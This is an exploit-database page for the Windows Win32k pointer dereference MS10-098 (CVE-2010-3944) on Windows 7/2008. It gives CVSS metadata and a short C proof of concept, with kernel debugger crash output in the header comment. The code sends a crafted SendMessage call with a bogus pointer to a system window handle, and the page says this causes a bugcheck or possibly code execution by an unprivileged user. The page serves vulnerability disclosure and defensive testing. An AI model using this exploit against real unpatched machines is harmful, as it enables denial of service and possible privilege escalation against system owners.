Windows Win32k Pointer Dereferencement (MS10-098)

2010.12.18
Risk: High
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/************************************************************************************* * MS10-098 * CVE-2010-3944 * * Microsoft Windows Win32k pointer dereferencement * * -------------------- * Affected Software * ------------------------ * Microsoft Windows 7 / 2008 * * * -------------------- * Consequences * ----------------------- * An unprivileged user may be able to cause a bugcheck, or possibly execute * arbitrary code by CSRSS.EXE. * * * * Credits : Stefan LE BERRE (s.leberre@sysdream.com) * Ludo t0ka7a * * WebSites : http://www.sysdream.com/ * http://ghostsinthestack.org/ * http://infond.blogspot.com/ * http://twitter.com/hackinparis * * kd> r * eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618 * eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc * cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 * win32k!xxxRealDefWindowProc+0xf6: * 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=?? * *************************************************************************************/ #include <stdio.h> #include <windows.h> #include <Winuser.h> int main(int argc, char *argv[]) { SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769 return 0; }

References:

http://www.microsoft.com/technet/security/Bulletin/MS10-098.mspx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top